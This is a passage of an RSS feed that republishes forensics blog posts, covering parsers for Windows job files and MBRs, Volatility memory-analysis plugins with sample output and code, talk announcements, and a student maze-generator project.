- User Name: SYSTEM
- Comment Length: 0x1e
- Comment (present if Comment Length is greater than 0): Created by NetScheduleJobAdd
- User Data
- Reserved Data
- Trigger Count
- Triggers - Scheduled Date: Jul 16 11:26:00.0 2012
- Job Signature

So I am releasing a job file parser script that can parse out almost all of the items mentioned above. You can find it here. The only things left off are the user reserved data, some of the trigger data and the job signature sections. I have only tested this on 32 bit *nix systems, so let me know if you hit issues on other platforms. You can see an example output of the above job file below:

$ python jobparser.py -f At5.job
Product Info: Windows Vista
File Version: 1
UUID: {F77378E3-8B4D-452A-A589-1CC5FA64CFD2}
Maximum Run Time: 72:00:00.0 (HH:MM:SS.MS)
Exit Code: 0
Status: Properties not set
Flags: TASK_FLAG_DONT_START_IF_ON_BATTERIES
Date Run: Monday Jul 16 11:26:00.15 2012
Running Instances: 0
Application: cmd
Parameters: /c notepad.exe
Working Directory: Working Directory not set
User: SYSTEM
Comment: Created by NetScheduleJobAdd
Scheduled Date: Jul 16 11:26:00.0 2012

Here is some output of job files taken from a Windows 2008 machine:

$ python jobparser.py -d Tasks

File: Tasks/At1.job
Product Info: Windows Vista
File Version: 1
UUID: {CE14B659-4115-4263-BFAD-A8318428AB68}
Maximum Run Time: 72:00:00.0 (HH:MM:SS.MS)
Exit Code: 0
Status: Properties not set
Flags: TASK_FLAG_DONT_START_IF_ON_BATTERIES
Date Run: Task not yet run
Running Instances: 0
Application: notepad.exe
Working Directory: Working Directory not set
User: SYSTEM
Comment: Created by NetScheduleJobAdd
Scheduled Date: Jul 17 02:20:00.0 2012

File: Tasks/At2.job
Product Info: Windows Vista
File Version: 1
UUID: {46F61E52-4581-49A9-9AD0-2244C206AEEB}
Maximum Run Time: 72:00:00.0 (HH:MM:SS.MS)
Exit Code: 0
Status: Properties not set
Flags: TASK_FLAG_DONT_START_IF_ON_BATTERIES
Date Run: Task not yet run
Running Instances: 0
Application: notepad.exe
Working Directory: Working Directory not set
User: SYSTEM
Comment: Created by NetScheduleJobAdd
Scheduled Date: Jul 16 14:20:00.0 2012

And here are a couple of XP Tasks. Notice that one has a Running Instances value of 1; this was copied when the command was currently running.

File: Solitaire.job
Product Info: Windows XP
File Version: 1
UUID: {3824DDBB-A037-4016-B99A-28BD95D429AF}
Maximum Run Time: 72:00:00.0 (HH:MM:SS.MS)
Exit Code: 0
Status: Task has not run
Flags: TASK_FLAG_INTERACTIVE, TASK_FLAG_DELETE_WHEN_DONE
Date Run: Monday Aug 13 12:37:00.10 2012
Running Instances: 1
Application: C:\WINDOWS\system32\sol.exe
Working Directory: C:\WINDOWS\system32
User: user
Comment: Comment not set
Scheduled Date: Aug 13 12:37:00.0 2012

File: Solitaire2.job
Product Info: Windows XP
File Version: 1
UUID: {3824DDBB-A037-4016-B99A-28BD95D429AF}
Maximum Run Time: 72:00:00.0 (HH:MM:SS.MS)
Exit Code: 0
Status: Task is ready to run
Flags: TASK_FLAG_INTERACTIVE, TASK_FLAG_DELETE_WHEN_DONE
Date Run: Monday Aug 13 12:37:00.10 2012
Running Instances: 0
Application: C:\WINDOWS\system32\sol.exe
Working Directory: C:\WINDOWS\system32
User: user
Comment: Comment not set
Scheduled Date: Aug 13 12:37:00.0 2012

References
1. Windows Forensic Analysis 2nd Ed, Harlan Carvey
2. JOB File Format, http://msdn.microsoft.com/en-us/library/cc248285%28v=prot.13%29.aspx
3. Windows Scheduler (at job) Forensics, http://computer-forensics.sans.org/blog/2009/09/16/windows-scheduler-at-job-forensics</description><link>http://www.secuobs.com/revue/news/397208.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/397208.shtml</guid></item>
<item><title>MBR Parser</title><description>Secuobs.com : 2012-04-22 03:20:50 - JL's stuff - With the increase in MBR infectors, I've decided to release a script I wrote that parses the MBR as well as hashes and disassembles the bootcode. I've found that MBR bootcode is pretty stable across systems of the same OS, so this script should allow you to quickly check for any discrepancies on a system. You of course need Python and distorm to use this script. A shortened example output can be seen below:

$ python mbr_parser.py -f mbr.bin
Disk signature: 96-80-96-80
Bootcode md5: 4ad444d4e7efce9485a94186c3f4b157

Bootcode Disassembly:
00000000  33c0              XOR EAX, EAX
00000002  8ed0              MOV SS, AX
00000004  bc007cfb50        MOV ESP, 0x50fb7c00
00000009  07                POP ES
0000000a  50                PUSH EAX
0000000b  1f                POP DS
0000000c  fc                CLD
0000000d  50                PUSH EAX
0000000e  be007cbf00        MOV ESI, 0xbf7c00
00000013  06                PUSH ES
00000014  b90002f3a4        MOV ECX, 0xa4f30200
00000019  bf1e0657cb        MOV EDI, 0xcb57061e
0000001e  b441              MOV AH, 0x41
00000020  b280              MOV DL, 0x80
00000022  bbaa55cd13        MOV EBX, 0x13cd55aa
00000027  81fb55aa7530      CMP EBX, 0x3075aa55
0000002d  f6c101            TEST CL, 0x1
00000030  742b              JZ 0x5d
00000032  be0008c704        MOV ESI, 0x4c70800
00000037  1000              ADC [EAX], AL
00000039  c744020600c74404  MOV DWORD [EDX+EAX+0x6], 0x444c700
[snip]
000001b2  0000              ADD [EAX], AL
000001b4  002c44            ADD [ESP+EAX*2], CH
000001b7  63                DB 0x63

Partition Table #1
Boot flag: 0x80 (Bootable)
Partition type: 0x7 (NTFS)
Starting Sector (LBA): 0x3f (63)
Starting CHS: Cylander: 0 Head: 1 Sector: 1
Ending CHS: Cylander: 520 Head: 254 Sector: 63
Size in sectors: 0x7fb68a (8369802)

Partition Table #2
Boot flag: 0x0
Partition type: 0x0 (Empty)
Starting Sector (LBA): 0x0 (0)
Starting CHS: Cylander: 0 Head: 0 Sector: 0
Ending CHS: Cylander: 0 Head: 0 Sector: 0
Size in sectors: 0x0 (0)

Partition Table #3
Boot flag: 0x0
Partition type: 0x0 (Empty)
Starting Sector (LBA): 0x0 (0)
Starting CHS: Cylander: 0 Head: 0 Sector: 0
Ending CHS: Cylander: 0 Head: 0 Sector: 0
Size in sectors: 0x0 (0)

Partition Table #4
Boot flag: 0x0
Partition type: 0x0 (Empty)
Starting Sector (LBA): 0x0 (0)
Starting CHS: Cylander: 0 Head: 0 Sector: 0
Ending CHS: Cylander: 0 Head: 0 Sector: 0
Size in sectors: 0x0 (0)

The script can be found here.</description><link>http://www.secuobs.com/revue/news/371293.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/371293.shtml</guid></item>
<item><title>Upcoming Cybercrime Studies talk: For a Free Digital Society by Dr. Richard Stallman</title><description>Secuobs.com : 2012-03-23 21:07:56 - JL's stuff - Yet another interesting upcoming talk at John Jay College on Tuesday March 27, 2012.

Center for Cybercrime Studies, John Jay College of Criminal Justice presents: For a Free Digital Society. Dr. Richard Stallman, President, Free Software Foundation.

Abstract: Activities directed at "including" more people in the use of digital technology are predicated on the assumption that such inclusion is invariably a good thing. It appears so, when judged solely by immediate practical convenience. However, if we also judge in terms of human rights, whether digital inclusion is good or bad depends on what kind of digital world we are to be included in. If we wish to work towards digital inclusion as a goal, it behooves us to make sure it is the good kind.

Richard Stallman launched the free software movement in 1983 and started the development of the GNU operating system (see www.gnu.org) in 1984. GNU is free software: everyone has the freedom to copy it and redistribute it, with or without changes. The GNU/Linux system, basically the GNU operating system with Linux added, is used on tens of millions of computers today. Stallman has received the ACM Grace Hopper Award, a MacArthur Foundation Fellowship, the Electronic Frontier Foundation's Pioneer Award, and the Takeda Award for Social/Economic Betterment, as well as several honorary doctorates.

Date: Tuesday, March 27, 2012
Time: 1:30 PM
Location: L61 Conference Center (New Building), John Jay College of Criminal Justice, 899 Tenth Avenue, New York, NY
RSVP: Nicole Daniels at 212-237-8920 or email ndaniels@jjay.cuny.edu
For additional information please contact Professor Doug Salane, Director of the Center for Cybercrime Studies, 212-237-8836 or email dsalane@jjay.cuny.edu
For additional Center for Cybercrime Studies events visit our web site: go to WWW.JJAY.CUNY.EDU, ACADEMICS, RESEARCH CENTERS and INSTITUTES.</description><link>http://www.secuobs.com/revue/news/365773.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/365773.shtml</guid></item>
<item><title>Differential EnScript</title><description>Secuobs.com : 2012-03-22 22:51:20 - JL's stuff - I know I haven't written much in the last few months; I've been busy. Even though I'm writing a blogpost today it's still going to be pretty short. This is because most of what I have to say has already been written up in documentation ahead of time. Today I'm releasing an EnScript that allows you to compare two disk images using various options. The purpose of this EnScript is to find differences on a machine after some event, such as infection, software installation etc., has taken place. I'm also releasing the source in hopes that others will be able to troubleshoot or expand it themselves as needed. I offer no warranties for this script nor promises that it is beautiful code (in all reality this was written hastily out of necessity); this is "as-is" and has worked well enough for me for my purposes. Unlike most of my stuff, however, I actually took time to create a GUI for it to make it easier to use. Information on how it works can be found in the documentation (pdf), so I will not cover it here. Hopefully someone out there will find it useful. Please feel free to leave comments and suggestions here or by email. Here is the DifferentialEnScript.</description><link>http://www.secuobs.com/revue/news/365570.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/365570.shtml</guid></item>
<item><title>Upcoming Cybercrime Studies talk: Digital Forensic Crime Labs</title><description>Secuobs.com : 2012-03-16 14:59:18 - JL's stuff - I just wanted to take the time to announce the following upcoming talk at John Jay College next week.

The Center for Cybercrime Studies, John Jay College of Criminal Justice presents: Digital Forensic Crime Labs. Monique Mattei Ferraro, MS, JD, CISSP, Technology Forensics, LLC.

Digital forensics labs throughout the country were set up and subsidized by the United States Department of Justice. Most labs are administered by police or law enforcement agencies. In 2009, the National Academy of Science released "Strengthening Forensic Science in the United States: A Path Forward," which made several recommendations. Among the recommendations were that criminal labs should be independent of police/law enforcement in order to retain an appearance of objectivity. This talk delves into the tensions between the recommendations and the practice, the ethical implications and current issues affecting digital forensics labs today.

Date: Wednesday, March 21, 2012
Time: 1:30 PM
Location: Haaren Hall, RM 630, 899 Tenth Avenue (10th Avenue and 59th Street)
RSVP: Nicole Daniels at 212-237-8920 or email ndaniels@jjay.cuny.edu
For additional information please contact Professor Doug Salane, Director of the Center for Cybercrime Studies, 212-237-8836 or email dsalane@jjay.cuny.edu
For additional Center for Cybercrime Studies events visit our Web site (http://www.jjay.cuny.edu/centers/cybercrime_studies/index.php) or go to WWW.JJAY.CUNY.EDU, ACADEMICS, RESEARCH CENTERS and INSTITUTES.</description><link>http://www.secuobs.com/revue/news/364072.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/364072.shtml</guid></item>
<item><title>Volatility 2.0: Timeliner, RegistryAPI, evtlogs and more</title><description>Secuobs.com : 2011-09-28 23:25:45 - JL's stuff - Back in July I gave a talk at OMFW about extracting timeline data from a memory sample using the Volatility framework. Now has come the time to release the plugins that came along with that talk. In addition to the plugins I have included a whitepaper on how these plugins were created and used. It is released more in hopes that people will see how to use the framework and be able to write their own plugins or extend existing ones. I have included all these plugins in a zip file:

$ unzip -l timeliner_9-2011.zip
Archive:  timeliner_9-2011.zip
  Length     Date   Time    Name
 --------    ----   ----    ----
    14455  09-28-11 14:40   volatility/plugins/timeliner.py
    10789  09-27-11 09:24   volatility/plugins/evtlogs.py
   147458  09-09-11 11:03   volatility/plugins/malware.py
    13559  09-22-11 19:09   volatility/plugins/registryapi.py
     8554  09-18-11 21:33   volatility/plugins/getsids.py
    40993  09-22-11 16:29   volatility/plugins/getservicesids.py
 --------                   -------
   235808                   6 files

- evtlogs.py: plugin to parse Evt logs from XP/2K3
- registryapi.py: plugin for routine registry actions
- getservicesids.py: plugin to collect and calculate service SIDs (used with the new getsids and evtlogs)
- timeliner.py: the timeline creating script that pulls everything together

MHL's malware plugins (malware.py) are included only for convenience. You can also download them from his repository and check there for updates. I would like to thank MHL and AW for their valuable feedback and Bertha M for extensive testing of the timeliner plugins. The links to the paper and plugins are below: Timeliner Release Documentation (PDF), timeliner plugins (ZIP). Note: any updates to these plugins will appear in my github repository first.</description><link>http://www.secuobs.com/revue/news/331630.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/331630.shtml</guid></item>
<item><title>Volatility 2.0 and OMFW</title><description>Secuobs.com : 2011-08-08 21:11:43 - JL's stuff - In case you missed it, Volatility 2.0 has been released! Please download it and test it out and let us know if you have any problems via the "issues" area of the Google Code project. We have lots of documentation and, for those on Windows who don't like to install Python, there is a standalone executable available in the downloads section. Make sure to check out the FAQ wiki which contains information on what is supported and how to use MHL's malware plugins. Some OMFW materials have been released: Moyix's slides (pdf), MHL's Stuxnet blogpost and slides, my slides (google docs). You can help with the development of Volatility by giving us suggestions for plugins, writing documentation or donating malware samples. Check out the FAQ for how to do all of the above.</description><link>http://www.secuobs.com/revue/news/321786.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/321786.shtml</guid></item>
<item><title>Volatility 1.4 UserAssist plugin</title><description>Secuobs.com : 2011-05-01 05:39:38 - JL's stuff - From a computer forensics standpoint, userassist keys can provide a lot of information about user activity (see Harlan's posts for more information). After looking at Didier Stevens' article on userassist keys for Windows 7 from Into the Boxes issue 0x0 and RegRipper, I decided to write up a plugin that would pull out UserAssist keys from all versions of Windows for Volatility. One thing I decided to add was an enumeration of GUIDs to human friendly folder names, which were obtained from here. The plugin is available in my git repository. Simply download and place into your volatility plugins directory and you're set.

Example Output

Below you can see some snippets of output for Windows 7. The fields are pretty self explanatory, though you can read Didier Stevens' article for more details. The hex dump is the actual data from which this information was parsed, just so you can verify it yourself.

$ vol.py -f win7.vmem --profile Win7SP0x86 userassist --no-cache
Volatile Systems Volatility Framework 1.4_rc1
----------------------------
Registry: C:\Users\admin\ntuser.dat
Key name: Count
Last updated: 2010-07-06 22:40:25

Subkeys:

Values:

REG_BINARY Microsoft.Windows.GettingStarted :
Count:        14
Focus Count:  21
Time Focused: 0:07:00.500000
Last updated: 2010-03-09 19:49:20
0000   00 00 00 00 0E 00 00 00 15 00 00 00 A0 68 06 00
0010   00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF
0020   00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF
0030   00 00 80 BF 00 00 80 BF FF FF FF FF EC FE 7B 9C
0040   C1 BF CA 01 00 00 00 00

REG_BINARY UEME_CTLSESSION :
Count:        187
Focus Count:  1205
Time Focused: 6:25:06.216000
Last updated: 1970-01-01 00:00:00
0000   00 00 00 00 BB 00 00 00 B5 04 00 00 B4 90 60 01
0010   10 00 00 00 39 00 00 00 E9 67 28 00 7B 00 44 00
0020   36 00 35 00 32 00 33 00 31 00 42 00 30 00 2D 00
0030   42 00 32 00 46 00 31 00 2D 00 34 00 38 00 35 00

[snip]

REG_BINARY %windir%\system32\displayswitch.exe :
Count:        13
Focus Count:  19
Time Focused: 0:06:20.500000
Last updated: 2010-03-09 19:49:20
0000   00 00 00 00 0D 00 00 00 13 00 00 00 60 CC 05 00
0010   00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF
0020   00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF
0030   00 00 80 BF 00 00 80 BF FF FF FF FF EC FE 7B 9C
0040   C1 BF CA 01 00 00 00 00

REG_BINARY %windir%\system32\calc.exe :
Count:        12
Focus Count:  17
Time Focused: 0:05:40.500000
Last updated: 2010-03-09 19:49:20
0000   00 00 00 00 0C 00 00 00 11 00 00 00 20 30 05 00
0010   00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF
0020   00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF
0030   00 00 80 BF 00 00 80 BF FF FF FF FF EC FE 7B 9C
0040   C1 BF CA 01 00 00 00 00

REG_BINARY Z:\vmware-share\apps\odbg110\OLLYDBG.EXE :
Count:        11
Focus Count:  266
Time Focused: 1:19:58.045000
Last updated: 2010-03-18 01:56:31
0000   00 00 00 00 0B 00 00 00 0A 01 00 00 69 34 49 00
0010   00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF
0020   00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF
0030   00 00 80 BF 00 00 80 BF FF FF FF FF 70 3B CB 3A
0040   3E C6 CA 01 00 00 00 00

REG_BINARY %ProgramFiles%\Microsoft SDKs\Windows\v7.0\Bin\vsstools\vshadow.exe :
Count:        0
Focus Count:  67
Time Focused: 0:06:12.811000
Last updated: 1970-01-01 00:00:00
0000   00 00 00 00 00 00 00 00 43 00 00 00 57 AE 05 00
0010   00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF
0020   00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF
0030   00 00 80 BF 00 00 80 BF FF FF FF FF 00 00 00 00
0040   00 00 00 00 00 00 00 00

REG_BINARY %windir%\regedit.exe :
Count:        2
Focus Count:  8
Time Focused: 0:03:22.626000
Last updated: 2010-03-17 23:40:36
0000   00 00 00 00 02 00 00 00 08 00 00 00 8E 15 03 00
0010   00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF
0020   00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF
0030   00 00 80 BF 00 00 80 BF FF FF FF FF 90 3A 93 3E
0040   2B C6 CA 01 00 00 00 00

Here you can see an example of output from Windows XP:

$ vol.py -f XPSP3.vmem --profile WinXPSP3x86 userassist --no-cache
Volatile Systems Volatility Framework 1.4_rc1
----------------------------
Registry: \Device\HarddiskVolume1\Documents and Settings\Administrator\NTUSER.DAT
Key name: Count
Last updated: 2010-11-24 16:35:34

Subkeys:

Values:

REG_BINARY UEME_CTLSESSION :
0000   91 52 5B 0E 1F 00 00 00

REG_BINARY UEME_CTLCUACount:ctor :
ID:           1
Count:        2
Last updated: 1970-01-01 00:00:00
0000   01 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00

REG_BINARY UEME_RUNPATH :
ID:           31
Count:        589
Last updated: 2010-11-24 16:30:49
0000   1F 00 00 00 52 02 00 00 A0 91 09 F4 F4 8B CB 01

REG_BINARY UEME_RUNPATH:D:\SETUP.EXE :
ID:           30
Count:        6
Last updated: 2010-09-20 15:02:47
0000   1E 00 00 00 0B 00 00 00 E0 85 39 E3 D4 58 CB 01

REG_BINARY UEME_RUNPIDL :
ID:           31
Count:        124
Last updated: 2010-11-24 14:19:29
0000   1F 00 00 00 81 00 00 00 50 78 79 9B E2 8B CB 01

REG_BINARY UEME_RUNPIDL:%csidl2%\Microsoft Visual Basic 6.0 :
ID:           1
Count:        2
Last updated: 2009-05-12 02:28:10
0000   01 00 00 00 02 00 00 00 B0 1E DB 4A A9 D2 C9 01

REG_BINARY UEME_RUNPATH:C:\Program Files\Microsoft Visual Studio\VB98\VB6.EXE :
ID:           1
Count:        1
Last updated: 2009-05-12 02:28:10
0000   01 00 00 00 06 00 00 00 50 62 FC 4A A9 D2 C9 01

REG_BINARY UEME_RUNPIDL:C:\Documents and Settings\All Users\Start Menu\Windows Update.lnk :
ID:           1
Count:        1
Last updated: 2009-05-12 02:28:36
0000   01 00 00 00 06 00 00 00 F0 D0 A1 5A A9 D2 C9 01

REG_BINARY UEME_RUNPATH:C:\WINDOWS\system32\wupdmgr.exe :
ID:           31
Count:        2
Last updated: 2010-11-24 14:50:05

Shoutz to ikelos for helping me optimize this :-)

References
Into the Boxes issue 0x0: http://intotheboxes.wordpress.com/2010/01/01/into-the-boxes-issue-0x0
RegRipper: http://regripper.wordpress.com</description><link>http://www.secuobs.com/revue/news/301835.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/301835.shtml</guid></item>
<item><title>What's the Difference? A Brief Volatility 1.4 Plugin Tutorial</title><description>Secuobs.com : 2011-04-05 21:18:30 - JL's stuff - So if you come to this blog, you've most likely heard of Volatility. You're probably also a user; maybe you've written some plugins, maybe not. Most people tend to fall into the latter category, though they may be power users. Today I thought I'd go over a few things that might make it easier for people to start writing their own plugins for simple useful things, because even though Volatility 1.4 isn't officially released, that doesn't mean that you can't enjoy it in the meantime :-)

A common way that people start their analysis is to look at differences in the output of plugins that represent what the OS knows about (pslist, modules, connections, sockets etc.) vs scanning for possible hidden/unlinked items. Examples of this can be seen in Jesse Kornblum's pstotal, Command Line Kung Fu's Making a Difference and MHL's psxview (which actually is very useful). If you look at some of these examples, you might think to yourself that it's difficult to write a plugin to get a process difference, but it's really not. You can use inheritance to make your life easier.

PSList vs PSScan2

Below is a complete plugin for printing out the difference between pslist and psscan2, which we will go over in detail.

1  import volatility.plugins.taskmods as taskmods
2  import volatility.plugins.modscan2 as modscan2
3
4  class PSDiff(modscan2.PSScan2):
5      """Print processes found in psscan2, but not in pslist"""
6
7      def __init__(self, config, *args):
8          modscan2.PSScan2.__init__(self, config, *args)
9
10     def calculate(self):
11         pslist = taskmods.PSList(self._config).calculate()
12         pids = []
13         for task in pslist:
14             pids.append(task.UniqueProcessId.v())
15
16         psscan = modscan2.PSScan2.calculate(self)
17         for task in psscan:
18             if task.UniqueProcessId.v() not in pids:
19                 yield task

First you need to import the plugin files that contain the classes you want to inherit into your plugin file. In this case PSList is defined in volatility/plugins/taskmods.py and PSScan2 is defined in volatility/plugins/modscan2.py. You can see the imports in lines 1-2. Now you have to define the class for your plugin (line 4). Try to give it a meaningful name for what it does; here we will name it PSDiff. Classes should be named in CamelCase. In the parentheses after the class name we specify which classes we want to inherit. Since we want processes that are only found in psscan2 output, we will use the render_text output function of psscan2 without having to redefine it. Therefore, since we want our new class to be more like psscan2, we choose this class to inherit. We specify it as modscan2.PSScan2 because we imported the plugin file as "modscan2" and the class for psscan2 is named "PSScan2". Next, on line 5, we add a description of what this plugin does as a multiline comment (a docstring). Whatever you type here will appear in the help function when you run python vol.py [plugin] -h, or just python vol.py -h. Lines 7-8 are the initialization and options section of the plugin. We are not adding any command line options to this plugin and are just initializing the PSScan2 class that we inherited. Lines 10-19 define the calculate part of our plugin, or what we want the plugin to do. In this case we only want to print out processes that are found by psscan2 and not pslist, so we should decide how to do that. Since processes should have unique process IDs (PIDs) to specify unique processes, PIDs that are found in psscan2, but not in pslist, will be printed.

Let's walk through the calculate function. First we gather all processes that pslist knows about (line 11). We call the taskmods.PSList class, give it our configuration (self._config) so that it knows what profile to use, and call its calculate function, which returns eprocess objects (and really is just DllList's calculate function, but we'll ignore that for now). In line 12, we define an empty list to store PIDs from pslist in order to compare them to psscan2's PIDs. Lines 13-14 collect all the PIDs pslist knows about. Now lines 16-19 repeat the process for psscan2, except that instead of collecting PIDs into a list, we check to see if the PID we've encountered is already in the list of PIDs from pslist. If it isn't, then we yield the task that contains that PID so that it will be caught by psscan2's render_text function and output onto the screen.

The output

Here you can see what it looks like on a Windows 7 image:

$ python vol.py -f win7.dd --profile Win7SP0x86 psdiff
Volatile Systems Volatility Framework 1.4_rc1
Offset     Name             PID    PPID   PDB        Time created             Time exited
---------- ---------------- ------ ------ ---------- ------------------------ ------------------------
0x3eac6030 SearchProtocol   2448   1168   0x3ecf15c0 2010-06-16 23:30:52      2010-06-16 23:33:14
0x3eb10030 SearchFilterHo   1812   1168   0x3ecf1480 2010-06-16 23:31:02      2010-06-16 23:33:14
0x3f0576a0 svchost.exe      2836   508    0x3ecf15c0 2010-06-16 17:02:34      2010-06-16 17:08:43
0x3faa66e8 dllhost.exe      948    628    0x3ecf1540 2010-06-16 23:32:15      2010-06-16 23:32:21
0x3fbcf920 dllhost.exe      3776   628    0x3ecf11e0 2010-06-16 23:32:09      2010-06-16 23:32:15

The only difference in this case seems to be exited processes. Here you can see a run on Moyix's ds_fuzz image:

$ python vol.py -f ds_fuzz_hidden_proc.img psdiff
Volatile Systems Volatility Framework 1.4_rc1
Offset     Name             PID    PPID   PDB        Time created             Time exited
---------- ---------------- ------ ------ ---------- ------------------------ ------------------------
0x0181b748 alg.exe          992    660    0x08140260 2008-11-15 23:43:25
0x0185dda0 cmd.exe          940    1516   0x081401a0 2008-11-26 07:43:39      2008-11-26 07:45:49
0x018af020 taskmgr.exe      808    620    0x08140280 2008-11-26 07:45:22      2008-11-26 07:45:40
0x019456e8 csrss.exe        592    360    0x08140040 2008-11-15 23:42:56
0x01946020 svchost.exe      828    660    0x081400c0 2008-11-15 23:42:57
0x019467e0 services.exe     660    616    0x08140080 2008-11-15 23:42:56
0x0194f658 svchost.exe      1016   660    0x08140100 2008-11-15 23:42:57
0x019533c8 svchost.exe      924    660    0x081400e0 2008-11-15 23:42:57

Suppose you are concerned that a PID could have been overwritten somehow (DKOM). You could rewrite the plugin to use _EPROCESS offsets instead of PIDs for the check:

1  import volatility.plugins.taskmods as taskmods
2  import volatility.plugins.modscan2 as modscan2
3
4  class PSDiff(modscan2.PSScan2):
5      """Print processes found in psscan2, but not in pslist"""
6
7      def __init__(self, config, *args):
8          modscan2.PSScan2.__init__(self, config, *args)
9
10     def calculate(self):
11         pslist = taskmods.DllList(self._config).calculate()
12         offsets = []
13         for task in pslist:
14             offsets.append(task.obj_vm.vtop(task.obj_offset))
15
16         psscan = modscan2.PSScan2.calculate(self)
17         for task in psscan:
18             if task.obj_offset not in offsets:
19                 yield task

The changes are in lines 12, 14 and 18. The idea is the same as our PID plugin above, only with offsets. So we rename our list to offsets to make it clearer (line 12). We append the physical address of where our _EPROCESS object is found (line 14); this is because scanners like psscan2 only output physical addresses, so we want to make sure that the addresses from pslist are the same kind. In line 18 we check to see if our _EPROCESS object offset found by psscan2 was already found by pslist, and if not we yield it so that its information will be printed. Output is the same as what we saw above for our two test images.

Conclusion

So there you have it. You can use the same idea for comparing output from modules and modscan2, connections and connscan2, sockets and sockscan or files and filescan etc. I'm leaving this as an exercise for the reader :-) You can also check out the references below for further reading on Python and Volatility. Make sure to read the Volatility Plugin Writers Guide that Mike Auty and Scudette put together.

References
Google Python Class: http://code.google.com/edu/languages/google-python-class
Python 2.7 Tutorial: http://docs.python.org/tutorial
Volatility Plugin Writers Guide: http://code.google.com/p/volatility/wiki/PluginWritersGuide
</description><link>http://www.secuobs.com/revue/news/296427.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/296427.shtml</guid></item>
<item><title>OT: Maze Generator Update</title><description>Secuobs.com : 2011-04-04 20:22:20 - JL's stuff - Since my QC (venus) website is no longer active, I thought I'd put the files for a maze generator some place where they can be accessed, especially since I have received emails about it. Here is the original information that was on venus before it disappeared:

Maze Generator Using Disjoint Sets

I recently went through several files of mine that had been stored away from my undergrad days. So I thought I might share them. Someone might like them. I have not changed any of the code since it was first written. I have only changed the formatting of a couple of files to make them easier to read and modified the comment header slightly (also for readability). Everything is well commented, which was my style at the time :-) Hopefully I have not erased anything important as I was doing these modifications, but I have no patience to test it at the moment. Oh, and I added a GPL for my code only, just in case (though no one will really want this :-P).

This particular project is from Prof. Stewart Weiss' CS 335 class, and consisted of writing a program that would generate mazes. It was compiled under Visual Studio 6.0 C++. We had studied Disjoint Sets in our class and were allowed to use code from Mark Allen Weiss' book from which we were studying. In addition to printing out to a text file, for extra credit we could output a graphical representation of the maze. For this I used code from Owen L. Astrachan's book which I think is from CMU Graphics. Two example outputs can be seen below. Other outputs include (for the two unknowns, sorry, I forgot what I punched in and have no patience to create more mazes or count cells): 5X5.txt, 25X40.txt, 40X30.txt, unknown dimensions 1, unknown dimensions 2.

The idea is fairly simple. The maze is broken up into cells. We will use the idea of disjoint sets: in the beginning each cell is in its own set. Cells are randomly chosen to remove a wall (and one of the four walls is also randomly chosen) and as the wall is removed, the cell and its new neighbor are then placed in the same set. You keep doing this until all cells are within the first (entry) cell's set. At this point you have a maze. You should make sure that once a cell is in the main (entry cell's) set, it is never picked again to remove a wall. You also have to be careful not to remove the outer border walls, thus creating alternate exits :-)

The disjoint sets class was modified from the original given in the book. There was a problem with the find() function so it was changed. Also, I added extra functions to make it fit with the maze class. I also created a vector of cells for the maze (see Cell class and Maze class below). I would have done things differently if I were writing this now, but this was in the beginning of my programming experience. Here are the disjoint sets files: DisjSets.h, DisjSets.cpp

I created a Cell class to represent each cell of the maze. This way I could control the walls of the cells and keep track of which walls were still up or down when I printed out the maze. Here are the Cell class files: Cell.h, cell.cpp

Next I wrote a Maze class to keep track of all of the cells. At first I thought to implement this using a 2-dimensional array, but ultimately decided to use a linear vector (defined in DisjSets) folded onto itself. There is also a list used to contain all cells of the maze. This is not the maze itself, but rather the cells that have not yet been placed into the main set in order to create a maze. I did this to cut down on run time, because you do not want to remove walls from cells that have already become part of the main set, and randomly picking cells most likely leads to picking cells that have already been chosen (especially towards the end). So keeping a pool of possible choices was the only logical thing to do to cut down on run time. Here are the Maze class files: maze.h, maze.cpp

Now for the main part of the program. At the time I was obsessed with making the main() function as small as possible:

int main()
{
    string resp;
    while (true)
    {
        getMazeInfo();
        cout &lt;&lt; resp;
        if (resp == "q")
            break;
    } // end while
    return 0;
}

Granted it could have been smaller :-) It basically loops forever creating mazes of whatever size is requested (I think 50x60 is the max) and stops when the user wants to leave. The code is NOT perfect. Just glancing over ASSN3Main.cpp, I see a buffer overflow error could occur in the getMazeInfo() function. Plus there are better ways now of dealing with the graphics. Yes, I COULD fix it, but then I would find other things and before you know it this would explode into a full time project... Ok, maybe I'm exaggerating. Perhaps some day when I have more time I will rewrite this little application. It's kinda fun to create mazes. The main code: ASSN3Main.cpp

I am releasing all of the code in gzip files as well as a precompiled executable. You can use 7zip to open the files. If you use the executable, you will see a message box saying something about how this was compiled with the student version and can't be used as commercial software or some such. Just push Ok and you're set. After you input the dimensions and the name of the output file to which you would like the maze saved, a graphical window will pop up. Click it with the mouse and the maze should display. You have to push ESC to get out of the graphical maze window. Files: maze-allcode.tgz, maze-exe.tgz. Hopefully I have managed to include all of the code that is needed. Let me know if something is missing.</description><link>http://www.secuobs.com/revue/news/296140.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/296140.shtml</guid></item>
<item><title>Windows Registry Paths (CMHIVE)</title><description>Secuobs.com : 2011-04-04 01:16:18 - JL's stuff - A little while ago I helped get the registry stuff working on images other than XP for Volatility 1.4. There are some differences in how the path names of the hives are stored, that I thought I might go over here. In XP we have the following structure for a registry hive:

